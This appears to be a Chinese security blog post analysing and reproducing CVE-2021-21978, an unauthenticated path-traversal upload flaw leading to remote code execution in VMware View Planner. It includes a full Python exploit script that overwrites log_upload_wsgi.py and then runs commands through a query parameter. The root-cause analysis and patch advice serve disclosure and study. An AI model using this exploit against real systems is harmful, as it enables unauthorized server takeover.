CVE-2021-21978:VM View Planner RCE分析复现

  • A+
所属分类:安全文章

上方蓝色字体关注我们,一起学安全!
作者:小泫@Timeline Sec
本文字数:1209
阅读时长:3~4min
声明:请勿用作违法用途,否则后果自负


0x01 简介
View Planner是VMware官方推出的一款针对view桌面的测试工具,通过这个测试工具可以估算出在指定的应用环境下可以发布多少个view桌面。


0x02 漏洞概述
编号:CVE-2021-21978
View Planner 的logupload端点缺乏输入验证,导致具有查看View Planner Harness网络访问权限的未经授权的攻击者可以上载和执行精心编制的文件,从而导致在logupload容器中执行远程代码。


0x03 影响版本

VMware View Planner <= 4.6.0


0x04 环境搭建

环境地址:

链接: https://pan.baidu.com/s/1fE69BWvjGNaZIuggIhVabg 提取码: mxpd


下载后直接导入到虚拟机

最后界面为如下图


CVE-2021-21978:VM View Planner RCE分析复现


0x05 漏洞复现
EXP地址:
https://github.com/skytina/CVE-2021-21978


VMware View Planner Web管理界面存在一个上传日志功能文件的入口,没有进行认证且写入的日志文件路径用户可控,通过覆盖上传日志功能文件log_upload_wsgi.py


CVE-2021-21978:VM View Planner RCE分析复现


# -*- coding: utf-8 -*- # @Time : 2021/3/5 下午1:38 # @Author : skytina # @File : CVE-2021-21978.py
import requests,json,sysimport urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def exploit(url): payload_fname = 'upload.txt' logMetaData = { "itrLogPath":"../../../../../../etc/httpd/html/wsgi_log_upload", "logFileType":"log_upload_wsgi.py", "workloadID":"2" } vul_path = '/logupload?logMetaData={logMetaData}'.format( logMetaData=json.dumps(logMetaData) ) # with open('./upload.txt','r') as f: # with open(payload_fname,'w+') as wf: # command_to_execute = "{command} > /etc/httpd/html/logs/.debug.log" # .format(command=command) # content = f.read() # content_w = content.replace( # "{command_to_execute}",command_to_execute # ) # wf.write(content_w) req_url = "{url}{vul_path}".format( url = url, vul_path = vul_path ) files = { "logfile":open(payload_fname,"r") } try: r = requests.post(req_url,files=files,verify=False) #print(r.content.decode()) cmd_r = cmd(url,'echo "NiuNiu2020" |base64') #print(cmd_r) if "Tml1Tml1MjAyMAo=" in str(cmd_r): return True else: return False except Exception as e: print(str(e)) return False
def cmd(url,command): cmd_url = "{url}/logupload?secert=NiuNiu2020&command={command}".format( url=url, command=command ) try: resp = requests.get(cmd_url,verify=False) return resp.content.decode() except Exception as e: return str(e)

def usage(): help = "[*] python3 CVE-2021-21978.py urlntpython3 CVE-2021-21978.py https://192.168.80.3" print(help)
#exploit('https://192.168.80.3','whoami')if __name__ == "__main__": if len(sys.argv) < 2: usage() else: url = sys.argv[1] if url.startswith("http://") or url.startswith("https"): if exploit(url): cmd_url = "{url}/logupload?secert=NiuNiu2020&command={command}".format( url=url, command="command" ) outmsg = "[*]{url} is vulnerablen[*]You can execute command like This: {cmd_url}".format( url = url, cmd_url=cmd_url ) print(outmsg) else: usage()

CVE-2021-21978:VM View Planner RCE分析复现


CVE-2021-21978:VM View Planner RCE分析复现


0x06 漏洞分析


CVE-2021-21978:VM View Planner RCE分析复现


可以看到apache 配置文件配置了logupload端点的指向文件为

/etc/httpd/html/wsgi_log_upload/log_upload_wsgi.py


其路径/etc/httpd/html/ 实际是容器内的路径,对应宿主机的/root/viewplanner/httpd


CVE-2021-21978:VM View Planner RCE分析复现


定位到

/root/viewplanner/httpd/wsgi_log_upload/log_upload_wsgi.py文件


CVE-2021-21978:VM View Planner RCE分析复现


由于缺少路径规范过滤,只需要稍微构造一下数据包即可上传恶意文件到任意路径,从而可以覆盖log_upload_wsgi.py 文件,达到远程代码执行的效果


0x07 修复方式


升级到最新版本。


参考链接:

https://paper.seebug.org/1495/

https://github.com/skytina/CVE-2021-21978

https://mp.weixin.qq.com/s/mBL9kYptreo62g4IonXSLg



CVE-2021-21978:VM View Planner RCE分析复现

CVE-2021-21978:VM View Planner RCE分析复现
阅读原文看更多复现文章
Timeline Sec 团队
安全路上,与你并肩前行




本文始发于微信公众号(Timeline Sec):CVE-2021-21978:VM View Planner RCE分析复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: